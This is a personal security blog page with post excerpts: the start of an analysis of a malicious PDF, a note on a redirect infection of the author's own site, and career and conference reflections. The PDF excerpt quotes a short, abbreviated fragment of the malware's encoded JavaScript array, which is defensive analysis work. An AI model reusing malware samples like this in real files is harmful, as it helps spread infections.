Latest News

Brian Baskin's Site (FWIW)

Malicious PDF Analysis: Reverse code obfuscation

Last Updated on Monday, 23 April 2012 01:35 Written by Brian Baskin Wednesday, 08 February 2012 19:56

I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

The email was received to my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it.

The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, that contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained all integer numbers that were between 0 and 74. This is not standard shell code.

arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code.

Closing Out 2011

Last Updated on Sunday, 29 January 2012 16:29 Written by Brian Baskin Sunday, 01 January 2012 13:35

It's been quite a few months since my last post, but this has definitely been a hectic and busy year. It's mostly due to that schedule that I've been unable to post anything interesting since... April. Wow.

When 2011 started I was just a few months into my new job with cmdLabs, a truly life-changing event. I still enjoy my time with Eoghan, Chris, and Terry and incredibly love what I do. It was only about a year ago when I felt completely helpless, bored, and unchallenged with my old employer. The technical challenges weren't coming, and I spent most of my time performing management tasks where the largest difficulties were to organize large spreadsheets, though I did volunteer for the job so I don't have too much of a right to complain. I sought out every opportunity with the outside to keep my feet grounded in technical work. With my continuing time at cmdLabs, that's changed dramatically. Each case was a fun and intricate challenge, and I was surrounded by the best to bounce ideas off of on a regular basis.

While working with cmdLabs the opportunity was open to provide forensic support to the Defense Computer Forensics Laboratory (DCFL). It took quite a few months for that to take place, but I finally joined the ranks there in early September. DCFL is a part of DC3 (Defense Cyber Crime Center), where I've been since 2000. However, I was always in the training side and not in the lab, and now the veil has been opened.

I took a spot in the Intrusions and Information Assurance division (I2A) as an intrusion analyst. It is no surprise that this is some of the most completely challenging and complex work I've ever done. I think back to the joy of performing penetration testing on servers and the rush of "popping a box", and realized that it doesn't compare with rewriting a large mathematical algorithm full of bitwise math to decode a new encoding method used to mask the exfiltration of data.

However, the first rule of defense work is that you don't talk about defense work. My social interactions have diminished greatly, mostly due to not having access to personal electronics or regular websites during working hours. As someone who loves to code new projects and release code and processes, I've had to place much of my personal commentary under self-scrutiny. And, when in doubt, bite my tongue and move on.

During the year I was roped into joining the General Dynamics - AIS (GD-AIS) team on the Maryland Cyber Challenge (MDC3 - no relation to DC3). This was a three-round contest that focused on blue-team, red-team, and forensics. For the blue-team exercise our team of six broke into two teams of three to focus on securing a Linux and Windows server, with myself on the Linux team. We passed that round and went into the Forensics round, which unfortunately occurred the same weekend I was at Derbycon - two hours after my talk, in fact. The staff at Derbycon kindly let me setup in the press room to work on the challenge remotely. Being remote on my Mac limited my abilities, but the challenge had a fair number of encoding and encryption challenges that I was able to break, and we passed the round. The final round was live at the Baltimore Conference Center, and was a bit of a shock. Up until 24 hours before the challenge we were told it was a full Capture the Flag with blue and red teaming. The day before we learned that it was full red-team, so we had to quickly adjust and retrain our team. We were easily outskilled by other competitors, but we placed decently.

For 2011 I stuck myself out there, much to the complaint of my introverted self. When the CFP for Defcon was about to wrap up, I decided to put together a talk called "Walking the Green Mile: How to Get Fired From Your Job After a Security Incident". A silly title, but I really suck at naming talks. The talk was about my increasing frustration in how many security practitioners were not doing their jobs right before, during, and after a security incident. As someone who has worked for years with many companies to respond to a security incident (including insiders, inrusions, and malware), I kept running into the same mistakes being made over and over. The talk was surmising those mistakes in a way for others to learn to stop making them.

I first submitted the talk to Defcon, then Security BSides Vegas. I was declined for Defcon, which I expected, and was ecstatic at being selected for BSides. I was already volunteering to work on the security team there, so was already "in", but being able to speak was the icing on the cake. I also gave the talk at Defcon Skytalks, an unrecorded, off the record room at Defcon.

"That wasn't so bad", I told myself. So, I submitted for Derbycon and was surprised to be accepted there as well. Derbycon was a first year conference that was perfectly orchestrated. It was also, in my opinion, the best rendition of my talk that I had given; maybe because I didn't realize that I was being recorded until afterward.

I then finished up my speaking circuit at the local BSides Delaware, which went pretty great. But, it was after this event that I just grew tired of speaking. Too many talks in the year than what I was accustomed to. And, for me, every time I get on podium I'm anxiously awaiting someone to stand up, scream out, or do something to show how wrong I am and how I shouldn't be up talking. Then afterward, I crash from the stress and am usually mentally exhausted for hours. So, likely no voluntary conference talks for me in 2012.

However, that won't be so easy to escape. I start off 2012 at the DoD Cyber Crime Conference. There I will be "teaching" two pre-conference training courses. I was originally billed to teach the Carrier File Analysis course (malware analysis of PDF, CHM, compound documents, SWF, etc). Staffing issues meant that I now am doing half-teaching of that course and the Introduction to Malware Analysis, which occurs simultaneously. So it looks like I'll be running back and forth between the two sold-out classes for four days. While there I will also be giving my Intelligence Gathering Over Twitter talk for the second year. It will be an update from last year, on tools and methods to obtain information about a target on Twitter and their associations. Group analysis, friend analysis, metadata, and metasites (twitpic, etc). After that, I'll be done for 2012 :)

I will still be trying to volunteer for BSides events for Vegas and Delaware, and planning on attending Shmocon, Defcon, BSides Vegas, Derbycon, and BSides Delaware. I'm going to make a push to finally attend RECon this year. But, being on-site full-time makes taking time off difficult, so I have to carefully pick and choose my cons.

Looking forward to new challenges in the upcoming year. Life is definitely more of a roller coaster ride now!

Add new comment

Analysis of Web-based Malware Attack

Last Updated on Tuesday, 17 May 2011 15:09 Written by Brian Baskin Thursday, 07 April 2011 17:52

Due to the very nature that this is a website on the Internet means that eventually it would be susceptible to an attack. Wordpress and blog sites are notoriously targeted with infections that append code to HTML files that point them to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified in just a few minutes after notification.

Notification came by way of Twitter when a friend notified me that my site was redirecting to somewhere else. I was sitting at my desk and quickly opened it to verify. Sure enough, it was:

Malware infection shown to visitors

I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.

The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:

With the infection spotted, I checked the file's MAC times to see when the attack occurred:

2010 - A Year of Great Conferences

Last Updated on Friday, 31 December 2010 21:52 Written by Brian Baskin Saturday, 11 December 2010 18:05

2010 has been a very intersting year for me in terms of information security conference. I'm almost ashamed that this has been the first year that I've ever attended DEFCON, but with reason.

For most of my security career I've steered way clear of most grey-area conferences; working in the DoD arena will do that to you, but I've had other reasons. I started in the information security world at a young age in the mid-90s. Living in Southern Jersey I typically hung out in the 609 BBS scene and sought out like-minded individuals. Of course, this journey led to local 2600 "hacking" groups. However, it took just one meeting for me to leave bewildered and dissatisfied. It seems most of the attendees were there to just find places to buy drugs, find places to do drugs, and brag about how badass they were at hacking. Being a non-drug user, I left disgusted and turned off from the scene. That image stayed with me for many years. I ended up in 'other' scenes, none of which got together in person. In the late 90s I longed to Greyhound it out to Vegas for DEFCON, but then learned that so were all of the local skiddies in the area. I then had to sit through their stories of long nights of drugs and vandalism, leaving me to wonder why I was even interested in going. I never went, and never thought twice about it. I wanted to go to learn and have fun, but I was given the wrong impression of the InfoSec scene.

Due to this belief, most of my con activity was stuck to "official" (read: boring) cons. The DoD Cyber Crime Conference, various military Information Assurance conferences, etc. It was a great atmosphere to teach and speak with those in the trenches who needed constant help and reinforcement. But, it was a completely different scene. I was the young, motivated guy in his 20s surrounded by seasoned investigators in their 40s and 50s.

ShmooCon came to the DC area. Working with Johnny Long, he gave it a great buzz and it was the first real infosec conference I felt myself drawn to since the old days. However, scheduling was a nightmare. ShmooCon typically ran during, or immediately after, the DoD Cyber Crime Conference, which my agency put on. It was impossible to justify to my family to spend two weeks away for DoD, then come back and immediately go to DC for a few days. It was for 2010 that I decided to just do it, and even paid completely out of pocket (thank you Priceline) and it was one of the best conferences I've ever attended (thanks to Snowpocalypse ;)).

After spending time with some new and old friends at ShmooCon, and working during that time of year with Jayson Street, I was talked into giving DEFCON another try. I even did the unthinkable and asked my company and/or my client to send me... and the client agreed. A fully paid trip to Vegas definitely made it nice. Riding the recent release of Dissecting the Hack, Jayson Street agreed to be my personal tour guide for much of the week.

BSides Vegas was my first BSides event, and a definite epic start to the week. It was my first time also meeting some good friends that I'd only known online.

Jayson introduced me to some of the good people and places during the after-hours BlackHat events, and I soon shed my existing preconceptions of the Vegas scene. Everyone was laid back, having drinks, and sharing ideas and debates.

DEFCON was its own experience. While on client time I was in talks, transcribing them (for my 26-page brief-back). Afterwards I floated between different friends and groups. I met Wish Lam from Chicago, who I was working with in the InfoSec Mentorship program, who got me into the SpiderLabs party. Syngress threw a nice dinner for their authors, preceding the EFF party where I found myself catching up with a malware analyst friend, Dan Raygoza. And while I'll self-admit that I was not cool enough for a Ninja Networks Badge (though I really, really wanted one), Savant42 was awesome to give me his +1. Ninja Party was... pretty awesome. Thomas Wilhelm and his lovely wife then invited me over to the 303 party afterwards; they were awesome to offer me a +1 earlier for the Ninja Party if I didn't have one.

All in all, I left with a different idea of DEFCON and the hacking scene. Yes, the hardcore druggies (for lack of a better term) were there, but instead of dominating the scene they were just in their own area doing their thing. I found that most attendees were just laid back people. Impression++ So I was one of those lamers that came into DEFCON late in the party, but will make the effort to get out as much as possible now.

Afterwards I hit up a few small conferences. After the success of BSides Vegas I took interest in BSides DE and was accepted to give a talk there. I found myself really enthralled with the small, casual conferences after that point.

I was fortunate enough to close out the year at DojoCon in the the ReverseSpace hacking space in Virginia -- a true casual unconference. The room was thrown together by attendees minutes before the kick-off. Everyone brought their own food to share, everyone pitches in to help, and everyone works together. A far cry from the large conferences that are run by professional groups (though I love my friends at Technology Forums).

2010 was definitely a year in which I broke most of my preconceptions of my peers. I focused on the small subsets and projected them to the larger community. That was wrong. The only way to know what a community is like is to just jump in with both feet and determine it yourself. What you get from an experience is only what you put into it.

Comments (2)

A huge change in careers

Last Updated on Monday, 08 November 2010 21:36 Written by Brian Baskin Thursday, 04 November 2010 14:10

I am just finishing up my first week at my new place of employment, cmdLabs, LLC. What an amazing roller coaster ride.

Let's revisit the past ten years... just to get it off my mind and on paper.

It was with very mixed feelings that I left my former employee, where I had been employed for over 10 years. In late 1999 and early 2000 I was working as a network engineer at a NASDAQ data center near Washington, DC, suffering through the daily commutes. Through a friend I learned of a government facility where they were teaching computer forensics and investigations. It was outside of my skill set, but something I wanted passionately to be involved in. So, I made the leap to join CSC on the Defense Computer Investigations Training Program (DCITP) contract, as it was known at the time (now called the Defense Cyber Investigations Training Academy - DCITA), part of the Defense Cyber Crime Center (DC3). The downside to the move? I had to start at the ground floor. I started as classroom technical support. It was literally starting at the bottom rung of the ladder.

I did my work, head down, and found new ways to improve upon processes. I built databases, performed research, and eventually became a research aide to many of the instructors. When they got stumped by a hard question from a student, I would receive a pager message (yes, we had text pagers back then), and would try to get an answer within five minutes. After about a year of hard work, I raised the question - Let me teach. Let me start small, by teaching a hardware block of the introduction class. After a month or two of deliberation, they decided to give me a one-hour block teaching motherboard technology, with it recorded and reviewed by the government customer. I went up and did my thing - 15 minutes into the presentation slicing my arm with a sharp solder leg and bleeding out. I casually grabbed a towel used for cleaning the white board, placed it on my arm, and used a demo motherboard to apply pressure - all without missing a step and without the students even being away (AFAIK).

I was given the job of being an instructor, and I started grabbing modules to teach. Within a year I has mastered all of the hardware/software/OS lessons of our core course and was the sole expert on the Linux section (being a user since 1994). Eventually, my need for more outgrew the class and I was moved to the Incident Responders team, where I started renovating their methods of Linux/Solaris incident response. I grew out from there into the Forensics material where I focused on host-based application artifacts. I then moved into Intrusions where I worked to renovate the Solaris Intrusion Response (FISE) course and build a new Linux Intrusion Response (FILE) course.

And all that in the space of just four years. I was working with Johnny Long on rebuilding our online investigations material, and we redesigned the course into new territories. Based upon much of my research, Johnny approached me with a side project. A Syngress project on IM/P2P security had lost an author and they needed someone to write the P2P analysis section, quickly. I then started researching and writing the Gnutella, Kazaa, and BitTorrent sections of the book, having them complete in just a month. And so began my side-career of being a "closer" for Syngress, but that's another story... But the research from that time, and since, has helped me become a premier P2P forensics researcher.

Eventually, by 2006, I had a mastery of the courses and was hitting a wall. At that point I was promoted to the Deputy Lead Technical Engineer position. I worked to review and authorize content changes to all of our courses. I performed extensive research on new forensic responses, next to Johnny who did research on new attacks, and then integrated the research into our training materials.

I also worked special projects for most of that period. When something huge came down the road, I was pulled to knock it out. One example was when, in 2008, the US Secret Service came to our customer with a huge project. They were establishing a brand new forensic school house in Alabama called the NCFI, where they would train state and locals in digital forensics. They asked us to develop seven courses with scenarios, instructor guides, PowerPoints, and handbooks, in a matter of six months. I was placed as the team lead and given four extensively qualified instructors to knock out the project. Which we did, on time and greatly under budget.

It was a dream job. It was my dream job. Yet, I left. Why? I pretty much hit my peak there. The projects that were coming down the line were less technical and less cutting-edge. They were more compliance-based to ensure we had standardized formats and guides. A lot of great technical work was still in process, but not enough to scratch my itch. After so many years there, I knew what was coming, and there were no big surprises left. So, it was very difficult to say goodbye to my family at CSC and DC3. A facility full of the brightest people doing great work. I feel like I've played a big hand in growing DCITA and DC3 to where it is today. I realize this sounds like I'm bragging of my work there, but it's just to show how strongly I feel about my family there.

I have moved on to become a Senior Consultant with cmdLabs, a wholly-owned subsidiary of The Newberry Group. I joined as the first real employee under the three partners: Eoghan Casey, Terrance Maguire, and Chris Daywalt. It's an exciting adventure, working out of cmdLabs' forensic lab in downtown Baltimore, but an opportunity to go the next step. This will literally be a ground floor operation to build out its capabilities, explore new forensic trenches, and have fun in the process.

What is there to learn from this? Do something you care about! Work in a field in which you are passionate! If you're not there right now, then get there. And realize that sometimes that takes a sacrifice. Don't expect that every new job is going to be an increase. You will take pay cuts, benefit cuts, and other sacrifices. But those are minor when compared to doing work that gives your life new meaning. Stop looking for a job that pays $10K more and look for one that you will gladly wake up every morning to do. And when, at a point, you've exhausted your stretch at one place, don't feel confined there. Seek out to improve yourself.

And to my friends with CSC/DC3. I will definitely miss you. But, as you all know, this is an extremely small community.

Comments (1)